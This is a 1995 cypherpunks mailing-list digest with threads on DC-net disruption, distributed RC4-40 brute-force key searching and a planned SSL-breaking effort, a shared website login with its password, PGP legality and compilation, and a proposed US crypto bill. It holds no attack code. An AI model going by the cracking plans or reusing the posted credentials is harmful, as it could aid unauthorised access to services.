22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From pgf at tyrell.net Mon Jul 17 10:29:23 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 17 Jul 95 10:29:23 PDT Subject: bi-directional dining cryptographers In-Reply-To: <9507171256.AA20139@cs.umass.edu> Message-ID: <199507171724.AA15346@tyrell.net> I'm rereading my mail at once; I've forgotten if I told you this already. Anyway, I just presupposed the same protocol outlined by Chaum in his paper. It's disruptable, but so's any DC-net to begin with. DC-nets presuppose a fair amount of co-operation between their participants. I'd also like to point out that this system indicates that during an attack/disruption on a traditional dc-net, the disruptor can tell what the original person was trying to send, even though noone else can. And then perhaps XOR the data with something offensive, and if the original sender tries to re-send, broadcast the result of the XOR, resulting in a total net output of the offensive material. I'm sure someone's going to try that sooner or later. Phil From wb8foz at nrk.com Mon Jul 17 10:37:25 1995 From: wb8foz at nrk.com (David Lesher) Date: Mon, 17 Jul 95 10:37:25 PDT Subject: TIME pathfinder registration Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I note someone has used "cypherpunks" as a login for TIME Mag's WWW service. I'd guess it was in the spirit of other such enrollments. If so, what's the password? - -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBMArQLhqU5+N/mI7JAQGAPwQAjVGA8kf/ncHJ+ltzVwnzr7ncCjCpcvxv kaPRYrIJHE5qQzm7YLKfrn6kv51f+QZgRQHZz0wWtQoQgSwta0WQXBbbU7CWFy95 vE1sKselPRElDkLRxzltgJqLCAYZBBAnjxlnck7EaDbXfyAGsTbNIE261PsXDMUk IyyYk+2Tc04= =JwQi -----END PGP SIGNATURE----- From pcw at access.digex.net Mon Jul 17 10:51:10 1995 From: pcw at access.digex.net (Peter Wayner) Date: Mon, 17 Jul 95 10:51:10 PDT Subject: WSJ on remailers... Message-ID: The WSJ has a article on anonymous remailers buried in the B section. It is pretty straightforward and ends up quoting some Finnish police officer saying that they're not going to go raiding remailers on any suspicion. They'll need a real crime. -Peter From liberty at gate.net Mon Jul 17 11:11:28 1995 From: liberty at gate.net (Jim Ray) Date: Mon, 17 Jul 95 11:11:28 PDT Subject: Root Causes Roots Message-ID: <199507171809.OAA76923@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Professor Froomkin writes: >Jim didn't take my Con Law I course. True, and from what I hear, I regret not taking it. > >In message <199507161819.OAA06090 at bb.hks.net> Jim Ray writes: >[cuts throughout] >> >> Amendment IX -- "The enumeration in the Constitution of certain rights >> shall not be construed to deny or disparage others retained by the people." > ^^^^^^^ >> [The right to write code was among many rights NOT enumerated.] >> > >Very hard to argue that the right to write code (as opposed to, >say, the right to write in code) A distinction my feeble mind fails to grasp, as doing the one is required in order to even make the other possible. [Now all can see why I had so much trouble in law school.] >existed in the late 18th century; A short trip to:"CME's cryptography timeline" [Recently suggested on this list] and found at URL: http://www.clark.net/pub/cme/html/timeline.html Reveals some interesting code-history. [In case the good professor or others on the list are without a SLIP/PPP connection, a not-so-short excerpt from CME's cryptography timeline follows]: _____________________________________________________________ - - From David Kahn's ``The Codebreakers'': ``It must be that as soon as a culture has reached a certain level, probably measured largely by its literacy, cryptography appears spontaneously -- as its parents, language and writing, probably also did. The multiple human needs and desires that demand privacy among two or more people in the midst of social life must inevitably lead to cryptology wherever men thrive and wherever they write. Cultural diffusion seems a less likely explanation for its occurrence in so many areas, many of them distant and isolated.'' [p. 84] The invention of cryptography is not limited to either civilians or the government. Wherever the need for secrecy is felt, the invention occurs. However, over time the quality of the best available system continues to improve and those best systems were often invented by civilians. Again, from David Kahn: ``It was the amateurs of cryptology who created the species. The professionals, who almost certainly surpassed them in cryptanalytic expertise, concentrated on down-to-earth problems of the systems that were then in use but are now outdated. The amateurs, unfettered to those realities, soared into the empyrean of theory.'' [pp. 125-6] In the list to follow (until I learn how to make tables in HTML), each description starts with (date; civ or govt; source). Sources are identified in full at the end. about 1900 BC; civ; Kahn p.71; an Egyptian scribe used non-standard hieroglyphs in an inscription. Kahn lists this as the first documented example of written cryptography. 1500 BC; civ; Kahn p.75; a Mesopotamian tablet contains an enciphered formula for the making of glazes for pottery. 500-600 BC; civ; Kahn p.77; Hebrew scribes writing down the book of Jeremiah used a reversed-alphabet simple substitution cipher known as ATBASH. (Jeremiah started dictating to Baruch in 605 BC but the chapters containing these bits of cipher are attributed to a source labeled ``C'' (believed not to be Baruch) which could be an editor writing after the Babylonian exile in 587 BC, someone contemporaneous with Baruch or even Jeremiah himself.) ATBASH was one of a few Hebrew ciphers of the time. 487 BC; govt; Kahn p.82; the Greeks used a device called the ``skytale'' -- a staff around which a long, thin strip of leather was wrapped and written on. The leather was taken off and worn as a belt. Presumably, the recipient would have a matching staff and the encrypting staff would be left home. 50-60 BC; govt; Kahn p.83; Julius Caesar (100-44 BC) used a simple substitution with the normal alphabet (just shifting the letters a fixed amount) in government communciations. This cipher was less strong than ATBASH, by a small amount, but in a day when few people read in the first place, it was good enough. 1564; civ; Kahn p.144(footnote); Bellaso published an autokey cipher improving on the work of Cardano who appears to have invented the idea. 1623; civ; Bacon; Sir Francis Bacon described a cipher which now bears his name -- a biliteral cipher, known today as a 5-bit binary encoding. He advanced it as a steganographic device -- by using variation in type face to carry each bit of the encoding. 1585; civ; Kahn p.146; Blaise de Vigen�re wrote a book on ciphers, including the first authentic plaintext and ciphertext autokey systems (in which previous plaintext or ciphertext letters are used for the current letter's key). [Kahn p.147: both of these were forgotten and re-invented late in the 19th century.] [The autokey idea survives today in the DES CBC and CFB modes.] 1790's; civ/govt; Kahn p.192, Cryptologia v.5 No.4 pp.193-208; Thomas Jefferson, possibly aided by Dr. Robert Patterson (a mathematician at U. Penn.), invented his wheel cipher. This was re-invented in several forms later and used in WW-II by the US Navy as the Strip Cipher, M-138-A. 1817; govt; Kahn p.195; Colonel Decius Wadsworth produced a geared cipher disk with a different number of letters in the plain and cipher alphabets -- resulting in a progressive cipher in which alphabets are used irregularly, depending on the plaintext used. 1854; civ; Kahn p.198; Charles Wheatstone invented what has become known as the Playfair cipher, having been publicized by his friend Lyon Playfair. This cipher uses a keyed array of letters to make a digraphic cipher which is easy to use in the field. He also re-invented the Wadsworth device and is known for that one. 1857; civ; Kahn p.202; Admiral Sir Francis Beaufort's cipher (a variant of what's called ``Vigen�re'') was published by his brother, after the admiral's death in the form of a 4x5 inch card. 1859; civ; Kahn p.203; Pliny Earle Chase published the first description of a fractionating (tomographic) cipher. 1854; civ; Cryptologia v.5 No.4 pp.193-208; Charles Babbage seems to have re-invented the wheel cipher. 1861-1980; civ; Deavours; ``A study of United States patents from the issuance of the first cryptographic patent in 1861 through 1980 identified 1,769 patents which are primarily related to cryptography.'' [p.1] 1861; civ/(govt); Kahn p.207; Friedrich W. Kasiski published a book giving the first general solution of a polyalphabetic cipher with repeating passphrase, thus marking the end of several hundred years of strength for the polyalphabetic cipher. 1861-5; govt; Kahn p.215; during the Civil War, possibly among other ciphers, the Union used substitution of select words followed by word columnar-transposition while the Confederacy used Vigen�re (the solution of which had just been published by Kasiski). 1891; govt/(civ); Cryptologia v.5 No.4 pp.193-208; Major Etienne Bazeries did his version of the wheel cipher and published the design in 1901 after the French Army rejected it. [Even though he was a military cryptologist, the fact that he published it leads me to rate this as (civ) as well as govt.] ______________________________________________________________ End of copy from "CME's cryptography timeline." Thanks [and apologies] to David Kahn, whose 1960s book is well worth buying, even today. ______________________________________________________________ Professor Froomkin continues: >hence it is hard to argue that it could be "retained" >today. In view of the foregoing timeline excerpts, I would respectfully disagree. > >Assuming that the ninth amendment has, or could have, teeth, [I am certain it _would_, with ballot-access-fairness reform, but that's a side issue, like abortion, that should *not* occupy this list. I am, however, quite willing to discuss it by private e-mail. JMR] >it >is unlikely to go beyond rights existing or closely analogous to >those held by "the people" [free white males, more likely] at >the time of the amendment's ratification. Just as well if you >think about it carefully. Careful thought reveals a atrong suspicion that the "3/5ths people" [slaves] had more use for crypto at the time than free white males did, but I doubt much, if any, evidence of that activity was preserved, and I'm sure it was _forcefully_ discouraged if ever discovered...My point is, slaves, or those who live in fear of eventual slavery, for whatever reason, have a strong affinity for cryptography. Note, for example, early use [mentioned in the timeline above] by the Jewish people. JMR Regards, Jim Ray "It is dangerous to be right when the government is wrong." Voltaire -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMAqmcG1lp8bpvW01AQFfHwP6AxRCwCIunx0GDuRkG5EZTjvkdPOIqaJd SAAdjHI12faTTL965zeNLw1ws/5/d+INC5U+j1i3mtRbBzb3rYZTRxtb3wmze0jR cQZblne2Q1jt1teH0xghFrrC3iPkIV9ILf5IdRafv1xqx/cv4/fuUpWb/89nCDzC U/mCFmCWNYE= =/+5k -----END PGP SIGNATURE----- From hayden at krypton.mankato.msus.edu Mon Jul 17 11:37:15 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Mon, 17 Jul 95 11:37:15 PDT Subject: RC4 crack Message-ID: -----BEGIN PGP SIGNED MESSAGE----- So what was the result of the RC4 key cracking thing that happened last week? It's at 100% but that's all it says. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMAqt9DokqlyVGmCFAQGxTgP/X6Cm7RfWOeWrzI52ws/cibtnZ/jJ6nTV 8MrWam8ZziWmq3fZeovLU/6sz2CAVBN9msqxo3H0AFTRLBrv1ZRuDj1bCzMEcsXW JSFiUleDUOliF3qGQMTU9PyaekVr8Kc/OdiHcJhWm5xZjbYA+yvrcwUYCUR/vKBw UPyL29Jx0L4= =xMlz -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From trei Mon Jul 17 11:42:51 1995 From: trei (Peter Trei) Date: Mon, 17 Jul 95 11:42:51 PDT Subject: Free The World Web Server project.. :) Message-ID: <9507171842.AA10254@toad.com> > > DM> however, would be unobtrusive. A web page that mails a form letter to > DM> _your_ congressperson's form-letter-readers (ie staff readers) would be > DM> much better, IMHO. > Expecially if the form letter generated would be randomly selected > from parallel word streams. For example: > I am by the rights in|glaring First Amendment violations in|fascist mentality > of|ominous provisions of|potential for civil rights infringement > by> SB <#BILLNO> by Senator > <#ORIGINATOR>..... This sort of thing bugs me a lot. If your level of passion on an issue is not enough to send an individually composed letter, then send a form letter. But don't try to fake out people that your note is actually individually composed. One of my pet peeves is junk mail tricked up to look like something else. I expect legislators feel the same way, and have a lot of practice recognizing it. Personally, if I feel strongly about an issue, I call up the legislators office and give his/her aide a piece of my mind. I try to be polite, informative, and find an angle of interest to that particular legislator, no matter how much I may actually despise the slimeball (this was tough when talking to Exon's press secretary). Peter Trei trei at acm.org Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation trei at process.com From kinney at bogart.Colorado.EDU Mon Jul 17 12:08:54 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Mon, 17 Jul 95 12:08:54 PDT Subject: TIME pathfinder registration In-Reply-To: Message-ID: <199507171908.NAA23963@bogart.Colorado.EDU> > I note someone has used "cypherpunks" as a login for TIME Mag's > WWW service. > > I'd guess it was in the spirit of other such enrollments. > If so, what's the password? This was me. The password is "writecode", since Pathfinder didn't allow the login and password to be the same. -- Will From bart at netcom.com Mon Jul 17 12:31:29 1995 From: bart at netcom.com (Harry Bartholomew) Date: Mon, 17 Jul 95 12:31:29 PDT Subject: Automated Rant Generators and Letter Generators In-Reply-To: Message-ID: <199507171929.MAA18513@netcom7.netcom.com> > > Cypherpunks could probably have an effect on hastening this "denial of > service" attack on the efficacy of letter-writing by releasing an > easy-to-use package that does all this letter writing at the click of a > button....just type in some key words, for the topics, and it does the > rest. > > An interesting project, actually. > > --Tim May > A final step might be to interface the output to old pen plotters like my HP7470A with an ascii-to-handwriting program. Akin to the White House souvenir signature generator, but with a set of parameters to mimic different "hands". Knuth's Metafont tricks come to mind. From werner at mc.ab.com Mon Jul 17 12:41:11 1995 From: werner at mc.ab.com (tim werner) Date: Mon, 17 Jul 95 12:41:11 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up Message-ID: <9507171938.AA03018@mondo.ab.com> >Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT) >From: attila >and, conspiracy theories non-withstanding, we the people do not govern >America --we are only given a short list of politicians who have sold >their soul to CFR's satanist inner circle. What's CFR? tw -- Well, Bust My Britches! Eggs Almondine and a Bottle of Beaujolais! From skaplin at mirage.skypoint.com Mon Jul 17 12:54:28 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Mon, 17 Jul 95 12:54:28 PDT Subject: Perl Shirts Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Anyone know when Joel is going to ship the perl shirts? Thanks, Sam -----BEGIN PGP SIGNATURE----- Version: 2.6.1 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMAq/xe5wXwthmZO1AQEeoQP/dnmJNi+yz5HwPVU3BCOlqLWrQlGHIGjW LcREDkaXaOWIqJB+5wr/Sc59l54niivh+PifgS72kreLgiw+Im1rF0ftAIUa1f9x 2NUvp+v1yMNB20By25jEhZHwGgMo1dKe67xOhOBVukoEhe1VLg4YO9i7XIqPCh0E WUlLMj38itQ= =zz5B -----END PGP SIGNATURE----- From mpd at netcom.com Mon Jul 17 13:05:07 1995 From: mpd at netcom.com (Mike Duvos) Date: Mon, 17 Jul 95 13:05:07 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up In-Reply-To: <9507171938.AA03018@mondo.ab.com> Message-ID: <199507172003.NAA22114@netcom2.netcom.com> > What's CFR? I'll take a wild guess and say the Council on Foreign Relations or some such thing. If memory serves me correctly, David Sternlight is a member. BTW, I'm back on the list after a few months of working on a project. Did I miss anything interesting? PGP hasn't been broken in some trivial fashion, I hope. From klp at noc.cis.umn.edu Mon Jul 17 13:05:36 1995 From: klp at noc.cis.umn.edu (klp at noc.cis.umn.edu) Date: Mon, 17 Jul 95 13:05:36 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up In-Reply-To: <9507171938.AA03018@mondo.ab.com> Message-ID: <300ac24415e4002@noc.cis.umn.edu> A little birdie told me that tim werner said: > > >Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT) > >From: attila > > >and, conspiracy theories non-withstanding, we the people do not govern > >America --we are only given a short list of politicians who have sold > >their soul to CFR's satanist inner circle. > > What's CFR? > Council on Foreign Relations. Silly me, I thought it was the Tri-Lateral Commission that really steered the boat, must have been wrong :) -- Kevin Prigge | Holes in whats left of my reason, CIS Consultant | holes in the knees of my blues, Computer & Information Services | odds against me been increasin' email: klp at cis.umn.edu | but I'll pull through... From aba at dcs.exeter.ac.uk Mon Jul 17 13:16:38 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Mon, 17 Jul 95 13:16:38 PDT Subject: RC4 crack Message-ID: <20156.9507172011@exe.dcs.exeter.ac.uk> Robert Hayden writes on cpunks: > So what was the result of the RC4 key cracking thing that happened last > week? It's at 100% but that's all it says. [I answered this in email but the answer is: all will be told soon] A brief explanation is called for, basically the 100% is %age allocated, and there are still a few stragglers being swept. For a brief explanation have a look at the brute-rc4.html page which I have now updated: http://dcs.ex.ac.uk/~aba/brute-rc4.html A more detailed report will be posted to cpunks when the last keyspace has been swept. We are expecting that no key will be found at this stage, as it was not sure to being with that the supplied plaintext/ciphertext was a correct pair of RC4-40. Lack of open Micro$oft specs on the workings of Micro$oft Access meant that we were guessing, and hoping that we got it right. The original brute rc4 project was started on the basis of 'lets brute it and see'. Looks like nothing will come out. Several folks have various parts of an RC4 SSL bruter (netscape secure sockets layer) and are working on sockets based farming tools to allow this one to be more automated, as there have been key space management problems with the bruterc4 effort. Also means a better % of idle time will be soaked on particpating machines, as we will not need to wait for operators to get in the next morning, or rely on people to remember which space they have swept to paste back into the confirm box. Soon ( a week maybe ) the respective parties hope to have all this sorted out, and get ready for a SSL breaking effort. So outcome of RC4 soon, followed by SSL effort announce in a while. In the RC4 outcome announce will be a % break down of how much compute people swept, even some folks on single PCs have swept as much as 1% of keyspace alone in 1 week. Adam From werner at mc.ab.com Mon Jul 17 13:17:48 1995 From: werner at mc.ab.com (tim werner) Date: Mon, 17 Jul 95 13:17:48 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <9507172015.AA03056@mondo.ab.com> Hi, I was reading in some Where to Get PGP Web page that "PGP2.6.2 is legal to use in the U.S. for non-commercial purposes (i.e., you cannot sell it or the functionality it provides)". Can anyone on the list say whether this is true? That is, was the use of "i.e." correct, or should it have been "e.g."? Or, to put it more succinctly, I was talking to one of the sys admins at A-B, and he said that we weren't allowed to use PGP to encrypt our mail, because Viacrypt owned the commercial rights. But, according to the bit I quoted, it would only be a violation if A-B tried to put PGP into one of their products. Has anyone heard a (hopefully legal, but I'll listen to anyone's opinion) answer to this? thanks, tw -- Well, Bust My Britches! Eggs Almondine and a Bottle of Beaujolais! From hayden at krypton.mankato.msus.edu Mon Jul 17 13:20:04 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Mon, 17 Jul 95 13:20:04 PDT Subject: RC4 crack In-Reply-To: <20156.9507172011@exe.dcs.exeter.ac.uk> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 17 Jul 1995 aba at atlas.ex.ac.uk wrote: > Several folks have various parts of an RC4 SSL bruter (netscape secure > sockets layer) and are working on sockets based farming tools to allow > this one to be more automated, as there have been key space management > problems with the bruterc4 effort. Also means a better % of idle time > will be soaked on particpating machines, as we will not need to wait > for operators to get in the next morning, or rely on people to > remember which space they have swept to paste back into the confirm > box. I remember when RSA129 was being done, the program you have you manually get a start location, and then email transparent any results that it got. The program that doled out areas to search would base those on what had already been mailed in. I don't know the details of how exactly that worked, however. But, if the program could be written in such a way that it was all automatic, mailing in results and automatically (maybe via a telnet port?) getting the information about what to search, that would be most nice. I'd basicly like to be able to start the program, nice it, slam it in the background, and forget about it. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMArF9DokqlyVGmCFAQGf7gP/QCJFRsBUJ7IRoKzheKeFXvFpjRxeJn11 n8DJbMlMaDoH6AIm49LrHI/fXmdlm8A9hrBMSemD7+HmImxSZmx2InS07eni4Khs j7Npqen2VTOHfr1RBDqUpzUv4FXVciYVLvQs4gzUhEIOjeN4iVhboUm/pBhaj4s4 3IKPuxIovwQ= =QR/m -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From jya at pipeline.com Mon Jul 17 13:28:50 1995 From: jya at pipeline.com (John Young) Date: Mon, 17 Jul 95 13:28:50 PDT Subject: \"Judgement Proof\" and Putting Up or Shutting Up Message-ID: <199507172028.QAA20744@pipe4.nyc.pipeline.com> Responding to msg by klp at noc.cis.umn.edu () on Mon, 17 Jul 3:4 PM >Council on Foreign Relations. > >Silly me, I thought it was the Tri-Lateral Commission >that really steered the boat, must have been wrong :) CFR -> TLC -> Opus Dei -> Cyclops in the Land of The Blind -> Blind Leading the Blind -> Wanderers in the Wilderness -> Michael Jackson Leading the World's Rainbow Children of Benetton -> Marty Rimm, 16-year-old Sheik of AC, Porno-poller of CMU -> Bob Guccione - > FC - > CFR! From ESPAULDING at CENTER.COLGATE.EDU Mon Jul 17 13:39:04 1995 From: ESPAULDING at CENTER.COLGATE.EDU (CHEWEY-NOUGAT-ABE) Date: Mon, 17 Jul 95 13:39:04 PDT Subject: PGP compilation problems on vax Message-ID: <01HSZETHQNDEA4LUAI@CENTER.COLGATE.EDU> Once upon a time I was able to successfully compile PGP 2.3 on our vax without a fuss. Then we switched over to a happy alpha vax, and all my jolly executables went the way of the dustbunny. My problem is this: neither 2.6 nor 2.3 code will compile on my alpha, apparently because the function hashpass is undefined. Anyone have an easy remedy they can email me? Thanks, Eric From aba at dcs.exeter.ac.uk Mon Jul 17 13:41:49 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Mon, 17 Jul 95 13:41:49 PDT Subject: RC4 crack In-Reply-To: Message-ID: <20191.9507172036@exe.dcs.exeter.ac.uk> > I remember when RSA129 was being done, the program you have you manually > get a start location, and then email transparent any results that it > got. The program that doled out areas to search would base those on what > had already been mailed in. I don't know the details of how exactly that > worked, however. Yeah it's quite like that except we're going for sockets, and an SMTP style protocol. That way people can write other apps to the protocol, for instance Andy Brown has an SSL bruter and key management s/w for NT, and he plans to interface to the 'master' software via this socket protocol, allows intermixing, so some people will be running direct IP, others with PCs or behind firewalls will be running via the WWW interface which also talks the SMTP style stuff to the master, and it would be possible if desired to write an email gateway to the socket protocol for interacting with the master. Also the socket protocol (blame Piete for this clever stuff, and most of the socket protocol design) is planned to work with arbitrary levels of masters, so you can start a local master say on your local network, the local master requests keys of the 'big master', and doles them out to 'slaves' running on each cpu you have. When all it's slaves have acked the keyspace it has drawn out from the big master, it'll ack that bigger keyspace with the bigmaster and draw out some more keyspace. > But, if the program could be written in such a way that it was all > automatic, mailing in results and automatically (maybe via a telnet > port?) getting the information about what to search, that would be most > nice. Yep a telnet port is it for both reporting and getting keys, also the WWW interface to the same. > I'd basicly like to be able to start the program, nice it, slam it > in the background, and forget about it. Right, niceing seems to be one option another is to suspend it whilst people are directly logged in, Kevin and some others have tools for this kind of thing. Also there was a similar ultra-nice batch job suspender which came with RSA129, which we might pinch/combine. The problem with nicing is that most unix schedulers don't seem to know what nice means,.. you still get a noticable slow down on interactive jobs on SGI boxes even if you've got it npri -h 150, and even though the bruterc4 (and the bruteSSL too) have tiny resident core sizes). Also we thought there should be an hours of play option so you can tell it (the slave) when it is allowed to hammer the machine, say 6pm - 7am or whatever. So, yes the idea that you can slam it in the background and forget it is a very nice one as it ensures max resource usage. Also it would allow us to setup a semi-permanent key cracking ring, with slaves that can support cracking both SSL and RC4, plus whatever anyone else adds later, you would get to install a new "ability" then your machine would say know how to do relations for a RSA-512bit or whatever. Interesting to see how many MIPs can be mustered en masse for this kind of app. Adam From warlord at MIT.EDU Mon Jul 17 13:44:29 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 17 Jul 95 13:44:29 PDT Subject: RSA-129 vs. RC4 (was Re: RC4 crack) In-Reply-To: Message-ID: <199507172043.QAA09575@toxicwaste.media.mit.edu> > I remember when RSA129 was being done, the program you have you manually > get a start location, and then email transparent any results that it > got. The program that doled out areas to search would base those on what > had already been mailed in. I don't know the details of how exactly that > worked, however. Not quite. The UIDs that were given out for RSA-129 had nothing to do with the search space. The reason is that RSA-129 did not search for the prime factors; it searched for quadratic residue relations. Moreover, ANY relations within the space is a valid datapoint. As a result, the UIDs ojnly told the factoring clients where to start looking for relations. You can effectively think of it as a seed to a random number generator. So long as everyone has a different seed, they will get different random numbers. Thats what the UIDs did; provided each client with a different starting point. You had to get a new UID for each run of mpqs because starting over with the same uid would re-run all the checks you've already done. Why double-run when UIDs are cheap? You see, unlike the RC4 crack, there was no relation between the UIDs and the relations returned. As the person who wrote the UID returning script, I can tell you that all it did was keep a file with the last UID given, and when an email requests came in, it would create a lock on that file, return the last UID+1 through the number of UIDs requested, and then update the file. There was no basis of the relations received. In fact, the UID responder could have been run on any machine -- it could care less about the data returned. > But, if the program could be written in such a way that it was all > automatic, mailing in results and automatically (maybe via a telnet > port?) getting the information about what to search, that would be most > nice. The point of runfactor was to allow you to obtain a large segment of UIDs and dole them out locally. Since there wasn't a relation between UID and data returned, then it didn't matter if some UIDs never returned. For RC4, you _have_ to search everywhere. Therefore, you would want to make runfactor an interactive program that contacted a central server whenever it wanted to get some search space. I dont think this would be very hard to write. -derek From warlord at MIT.EDU Mon Jul 17 13:49:49 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 17 Jul 95 13:49:49 PDT Subject: PGP compilation problems on vax In-Reply-To: <01HSZETHQNDEA4LUAI@CENTER.COLGATE.EDU> Message-ID: <199507172049.QAA09700@toxicwaste.media.mit.edu> > Once upon a time I was able to successfully compile > PGP 2.3 on our vax without a fuss. Then we switched over to > a happy alpha vax, and all my jolly executables went the way of the > dustbunny. My problem is this: neither 2.6 nor 2.3 code will compile > on my alpha, apparently because the function hashpass is undefined. > Anyone have an easy remedy they can email me? There is no such animal as an "alpha vax". Perhaps you mean an Alpha running Open/VMS? PGP 2.6 is way old. The most recent release is 2.6.2, which I'm told builds fairly cleanly on Open/VMS. You shoulod download 2.6.2 and try using that. -derek From Andrew.Spring at ping.be Mon Jul 17 13:53:45 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Mon, 17 Jul 95 13:53:45 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >I am not familiar with american laws and have two questions: > >1. If the bill becomes law, how can someone who violates it be >punished? > - From the top of my head: Subpoena your service provider's computer records. Intimidate your roommate into testifying against you. Tapping your phone. Entrapping you into doing it. Feds are in the business of putting people behind bars. They are _very_ good at it. > >2. Does someone who publishes software which encodes or encrypts >(ASCII is a code, isn't it?) have to prove that he has provided the >universal decoder to the state or does the state have to prove that he >didn't do? I'm betting that the Feds will adopt as a working definition anything that requires a key to decrypt the communications. That means compression software, rot13, and most hash functions are ok. > >In the former case, does he get any receipt from the department of >justice and what does the receipt say (1.3MByte of software >received...)? > This is the U.S. Government. They Have Forms. You just file form THX1138/KGB666-007, omitting pages 113-115 and substituting Addendum Foxtrot Uniform Delta; then you're covered. >In the latter case, how do they want to prove he didn't? If he gave >just a big > > for(i=0;;i++) try_key(i); > >how do they want to prove this doesn't work? There is a certain >problem in theory. I don't know the english name, but in german it is It's the Halting Problem, in English. Expert Testimony: "We experimented with 113,296 keys chosen at random and the defendants algorithm took an average of 29,000 years to find each one. It is our professional opinion, therefore, that the defendant is jacking us around and ought to be keelhauled". ObPGP: Incidentally, did you know that PGP puts a "- " in front of a line that begins with the word "From"? Just so "sendmail" doesn't hose your signatures, I spoz. -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBMArcIY4k1+54BopBAQGEQAQA3POWJd+5OtdRy9otN0PZWSzA+wyIjM99 +PqxyoBlfvnrut7xNYzgGOedyLjQHoWMgXwWAtArIr2srFqwr0eUu5aUXcYxySBx NiEH/G4Y3Z3paL2yOdDLPqrjB7B68UusCYvgTYUCLrkcLU+zqOMfvTPRTx63AQ9h QoBB8/XMddc= =/k0o -----END PGP SIGNATURE----- -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From Andrew.Spring at ping.be Mon Jul 17 13:53:48 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Mon, 17 Jul 95 13:53:48 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >You _were_ using that software on a _computer_ weren't you? Guess it's >one of your racketeer's tools, so we'll have to take it for ourselves, er, um, >for evidence and protection of national security.... This wasn't really my point. Grassley's bill implies that uploading crypto to an overseas FTP site would qualify as a predicate act, needed for a RICO seizure. I think he is assuming that someone would do this for the purposes of making money: and that anything bought with that money would be RICOable. I don't think he or anyone else in Congress is aware that people tend to do this stuff for free. I remember one of the sponsors of the CDA ranting about pornographers "profiteering" from pornographic images on the Internet, blissfully unaware that stuff downloaded from alt.sex.binaries.insert.your.fetish.here doesn't profit anyone but the phone company (for the hours you stay online to get it). So I'm wondering who this RICO stuff applies to. The guy who wrote it and uploaded it to an FTP site? He's not profiting. The guy who uses it? He didn't commit the predicate act. Who? -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBMArYUI4k1+54BopBAQGk6AQAufSXBBB9/XoDcKoWaalLdp+hxO/kSER1 wEtEAcRqh3YZR9IRVFuFsmotJ8exupaOzy+OLldublq1RfaCR/Jjqvc0V1uSovYA DA9eFjYApGSPoDkQp6C6ZVcJVqpD1QQhNYpY96nABTp45AYsMlrdpartwjJZKDLz Rx1EFNVwoC4= =K75H -----END PGP SIGNATURE----- -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From hayden at krypton.mankato.msus.edu Mon Jul 17 15:24:38 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Mon, 17 Jul 95 15:24:38 PDT Subject: RSA-129 vs. RC4 (was Re: RC4 crack) In-Reply-To: <199507172043.QAA09575@toxicwaste.media.mit.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 17 Jul 1995, Derek Atkins wrote: > Not quite. The UIDs that were given out for RSA-129 had nothing to do > with the search space. The reason is that RSA-129 did not search for > the prime factors; it searched for quadratic residue relations. > Moreover, ANY relations within the space is a valid datapoint. As a > result, the UIDs ojnly told the factoring clients where to start > looking for relations. Thanks, I stand corrected. As I said, I really don't understand at a basic level how it works. These factoring projects are, to me, an interesting sociological experiment. Of course, to do this correctly, you need software that is easy to use. :-) So, the ability to run a program in such a fashion that as much is automated as possible 